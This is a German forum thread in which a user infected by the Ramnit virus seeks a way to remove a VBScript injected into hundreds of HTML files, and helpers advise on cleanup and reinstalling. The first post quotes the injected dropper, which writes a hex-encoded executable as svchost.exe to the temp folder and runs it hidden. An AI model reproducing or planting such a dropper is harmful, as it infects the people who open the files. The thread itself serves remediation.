Hallo,

ich hatte mir vor einige Zeit einen Schädling eingefangen, der u.a. .dll/ .exe und .html/ .htm Dateien beschädigt hat. Den Übeltäter selber konnte ich wieder los werden, das System ist momentan "sauber", bin mit diversen Progs drüber.

Nur die veränderten .html und .htm Dateien bekomme ich nicht sauber, ohne jetzt manuell an zich Hunderte Dateien ran zu müssen, habe auch keine weiteren Sicherungen und die Dateien sind mir sehr wichtig. Habe es auch schon hiermit versucht, leider ohne Erfolg: hxxp://polygoncell.blogspot.de/2010/08/i-got-infection-of-virus-on-my-pc-last_7746.html

Das o.g. Programm greift nicht auf Unterordner zu und fixt auch nicht gefundene Dateien, zumindest bei mir unter Win Vista nicht.

Dieser Script selber fügt sich in besagte Dateien in den letzten Absatz mit ein, sieht dann in etwa so aus:

HTML-Code:

</html>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000D80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000525B767E163A182D163A182D163A182DD535452D1B3A182D163A192D2E3A182D31FC6A2D173A182D31FC642D173A182D31FC602D173A182D52696368163A182D000000000000000000000000000000000000000000000000504500004C010600000000000000000000000000E0000F0 

Dieser Zahlenreihenfolge geht dann ellenlang weiter (ist jetzt nur ein Ausschnitt) dann hört es nach den ganzen Zahlen auf mit:

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000D28EB95B3907F22C0DB13C94688D6548BE9B82A500A07017BB983BDB80711060B9D4E83011780E89E57DD485366277C80E6170F780F35120B425F77F302B55F7A8326446708C542EA0D0D48422BCCF85496C72DEF49B0B4DC9849175821FF02CFD8EC3B93CEB8D9FF9410ED8607270C01CF4D24B358279C0F78674CA45C69A7E82E7DC260BF647741C05C71603A75C6D8F06D552F35E11EE7538B0BAEBD0759A92789E7C326A4058F519876638910A5EA8F4FE3177084CE8370D62EAFD50606B2AB24E904ACFD5455C3AEC847EA59F3CD2B3CC9DEB4CF85937F559F3A938FE148E03AE79EDDCC11F802DD1CD142F759EE765931E8A7927E3C0DF2AD1B5ED184203672D701536910A97D8DCC9C1643C27E7432D7B17F669D14D36B08B39262ABBF94081C99A4203A76B1640D63A2A1510E063BF66F53AB040AEB9849DD3909C58F8ADDFA3FB912AF1388AD0A5FB912AA7FB912AA6FB912A2CD2D967C007D56489EC912AA5FB912A"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT><!--�<��
K������ ��4��̶�ERe~����_�<�خ��Y=�V!�5]db�2�f�S��歹J�/sɂֈ��{�ЮW�J2S�
�ⶄ�����饞��i�X$J�
�\�;R��ϫt�
�~,���E-�V���PP�Fu\��$?%<y���
�=�BMa�!��\cõv�=�a�]C�q�&o:��
8�*�e,��o;}�a��eW!J�絈���������GO���˾�c���L@�j7��6b^^������G��^Q��|e�=�z
zP���u�[�ݖS��35���_��o�=��4O� 8��WζA���Ne>���(H  �fR}��f�f�f��.NgS�PZ=f �f-->

Habt ihr eine Idee oder einen Tipp (anderes Programm o.ä.) wie ich meine gesammten Laufwerke nach html und htm Dateien mit diesem Script absuchen und automatisch entfernen lassen kann

Hi,

ich kenne da nichts, musst Du von Hand machen. Oder Du schreibst Dir selbst ein Script welches das macht (wenn das überhaupt möglich ist).

Hey,

so, im ausgeschlafenen Zustand hat es dann doch noch geklappt

Der oben genannte Script Remover funktioniert wunderbar, wenn man einiges beachtet. Ich hatte das Problem, dass das Prog angeblich nicht tief genug scannt, dabei war es nur ein Berechtigungsproblem, worauf man achten muss. Bei mir blieb der Scanner immer in den Programm Data oder Programm Files Ordnern stehen mit "access denied!". Der einfacherhalber sollte man den Scann mit dem richtigem Windows Administrator Konto durchführen, nicht mit einem Konto mit "nur" Admin-Rechten, bei letzterem müsste man die Besitzrechte der Ordner und Unterordner übernehmen, da diese dem TrustedInstaller zugeordnet sind, das hat aus Sicherheitsgründen schon seine Berechtigung und sollten im Anschluß wieder unbedingt rückgängig gemacht werden. Zudem ist diese Möglichkeit mit mehr Aufwand verbunden, drum besser das Windows Administrator Konto beim Scann nutzen.
Alle infizierten Dateien wurden gefunden und der VB Script wieder rausgeschlöscht, war doch mehr als ich erwartet habe, per Hand hätte man die Menge niemals bewältigen können, geschweige denn gefunden, zumal das manuelle öffnen auch schon ne Ewigkeit braucht, da das Script ellenlang ist, dann lieber das System sauber neu aufsetzen, wenn man auf die .html/ .htm Dateien verzichten kann.

Worauf noch unbedingt zu achten ist, bevor man sich an die html Dateien macht ist, dass man schon mit einem guten Scanner alle infizierten Dateien (.exe, .dll's) gefixt hat und die zusätzlich installierten Schädlingsanwendungen gründlich entfernt hat (im abgesicherten Modus), sonst wird der Script immer wieder neu in die Html-Dateien geschrieben und breitet sich auch auf andere Laufwerke aus, da es immer im Hintergrund mitläuft. Davor auch keine Programme/ Anwendungen/ Html-Dateien ausführen, da diese schon befallen sein können.

Der Übeltäter wird als Virus.Win32.Ramnit.a bzw. Worm.Win32.Ramnit.a bezeichnet ... falls mal jemand diesen auch mal entfernen muss und bei den Html-Dateien nicht weiter kommt

VLG

Ich will ja jetzt nicht den Miesepeter machen, aber ich bereinige seit 2008, und

Zitat:

Virus.Win32.Ramnit.a

ist nicht zu bereinigen. nicht sauber.

Ist schon ok

Darf ich fragen, woran du das fest machst, bleiben da noch irgendwelche toten Leichen über? Bzw. was könnte im schlimmsten Falle passieren, wenn ich denke, mein Rechner ist sauber? Ich kann zumindest keine verdächtigen Prozesse/ Anwendungen im Hintergrund fest machen.

Ich habe von meinem Rechner leider keine Win CD ausgeliefert bekommen, habe nur eine Wiederherstellungspartition auf einen anderen Laufwerk (werksseitig). Meinst du, da könnte sich dann auch etwas eingenistet haben, wenn ich das System neu aufsetzen sollte?

Nein, die Wiedherstellungspartition ist sicher. Aber im normalen System wird jede ausführbare Datei infiziert.

Du bereinigst die wirkliche malware, startest dann irgend eine Exe, schwupp geht das Spiel von vorne los.

Hätte dann aber nicht mein Virensanner anschlagen sollen, zumal er einige .exe Dateien gleich in die Quarantäne geschoben hat. Im Nachhinein könnte dieser natürlich auch manipuliert sein, sodass ich es nicht merke, oder?

Ich müsste vorher aber unbedingt einiges sichern, was ist denn, wenn ich ein externes Laufwerk einbinde, könnte da was rüberschwappen?

Zitat:

Im Nachhinein könnte dieser natürlich auch manipuliert sein, sodass ich es nicht merke, oder?

Exakt

Mach erstmal zur Kontrolle:


ESET Online Scanner

• Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
• Lade und starte Eset Online Scanner
• Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
• Aktiviere die "Erkennung von eventuell unerwünschten Anwendungen" und wähle folgende Einstellungen.
• Klicke auf Starten.
• Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
• Klicke am Ende des Suchlaufs auf Fertig stellen.
• Schließe das Fenster von ESET.
• Explorer öffnen.
• C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor öffnen (bebildert).
• Logfile hier posten.
• Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
• Manuell folgenden Ordner löschen und Papierkorb leeren => C:\Programme\Eset

Danke dir, der Scann hat zwar mehrere Stunden gedauert, aber es wurden weitere htm Dateien mit nem entsprechendem Inhalt gefunden (die fingen nicht mit dem JS Befehl an, waren irgendwelche chinesischen Zeichen), habe sie dann gelöscht (da entbehrbar). Sonst wurden halt nur noch die Dateien, die in der Qurantäne sind angezeigt, sonst nichts

Heißt das, ich bin clean?

Nö.

das heisst du darfst dich trauen, wenn du willst. Bei Fileinfector hört der Spass eben auf

LoL ok

Danke dir auf jeden Fall für deine Unterstützung und den Rat, die nächste Formatierung kommt bestimmt

Gern Geschehen